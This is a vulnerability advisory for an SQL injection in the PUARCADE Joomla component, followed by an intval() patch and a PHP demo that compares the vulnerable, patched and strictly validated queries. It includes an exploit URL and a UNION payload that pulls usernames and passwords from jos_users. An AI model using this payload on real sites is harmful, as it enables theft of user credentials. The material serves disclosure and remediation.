
Pu Arcade component for Joomla - SQL injection




I discovered a vulnerability in the PUARCADE component for Joomla (the latest version is vulnerable).

SQL injection vulnerability in puarcade.class.php <= v2.2, a component for Joomla.
--------------------------------------------------------------------------------------------------------------------------

Author : MantiS
---------

Vulnerable code :
------------------------
function warningByGame($gid) {
        global $database;

        // $gid comes straight from the request and is concatenated into the
        // SQL unquoted and unvalidated, so any text after the id becomes SQL.
        $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"
                  . " WHERE g.contentratingid = c.id"
                  . " AND g.id = $gid";
        $database->setQuery($query);
        $cont = $database->loadObjectList();
        return $cont;
}
--------------------------

Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]
---------
Can be exploited with "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns).
=0D
Patch :
--------
Place before "$query = "SELECT c.id......... " :
$gid = intval($_GET['gid']);
This forces $gid to an integer before it is interpolated into the query, so the value can only ever consist of digits and the query structure cannot be changed by the request. Note that this only holds because g.id is a numeric column; the same fix is not a general substitute for escaping or binding string parameters.
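The following is an added example, not code from the advisory or from the PUARCADE component. It rebuilds the same SQL string that warningByGame() produces, once as written (vulnerable) and once with the advisory's intval() patch applied, and feeds both a legitimate id and the UNION string quoted above, so the effect of the fix on the generated query can be read directly without a database. The strict variant that rejects non-digit input instead of coercing it is an assumption of this example, not part of the original patch.

```php
<?php
// Added example (not part of the advisory): compare the SQL that
// warningByGame() generates before and after the patch, offline.

// The query exactly as the vulnerable code builds it: $gid is interpolated verbatim.
function buildQueryVulnerable($gid) {
    return "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename"
         . " FROM #__puarcade_games as g, #__puarcade_contentrating as c"
         . " WHERE g.contentratingid = c.id"
         . " AND g.id = $gid";
}

// The advisory's patch: coerce to an integer before the value reaches the query.
// intval("0 UNION SELECT ...") yields 0, so only digits ever get interpolated.
function buildQueryPatched($gid) {
    $gid = intval($gid);
    return buildQueryVulnerable($gid);
}

// Stricter variant (assumption, not from the advisory): reject any value that is
// not a non-negative decimal integer instead of silently turning it into 0.
// Returning null lets the caller log and refuse the request, which is also a
// useful detection signal for injection attempts against this parameter.
function buildQueryStrict($gid) {
    if (!is_int($gid) && !is_string($gid)) {
        return null;
    }
    if (!preg_match('/^[0-9]+$/', (string) $gid)) {
        return null;
    }
    return buildQueryVulnerable((int) $gid);
}

// Constructed inputs: a legitimate game id and the injection string from the advisory.
$inputs = array(
    'legit'   => '7',
    'payload' => '0 UNION SELECT password,username,0,0,0 from jos_users--',
);

foreach ($inputs as $label => $gid) {
    echo "== $label ==\n";
    echo "vulnerable: " . buildQueryVulnerable($gid) . "\n";
    echo "patched:    " . buildQueryPatched($gid) . "\n";
    $strict = buildQueryStrict($gid);
    echo "strict:     " . ($strict === null ? '(rejected)' : $strict) . "\n\n";
}
```

Running this shows the vulnerable builder emitting the attacker's UNION as part of the WHERE clause, the patched builder emitting "AND g.id = 0" for the same input, and the strict builder refusing it outright. The strict form is preferable where the application can afford to fail the request, because a coerced 0 silently hides the attempt while a rejection can be logged.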

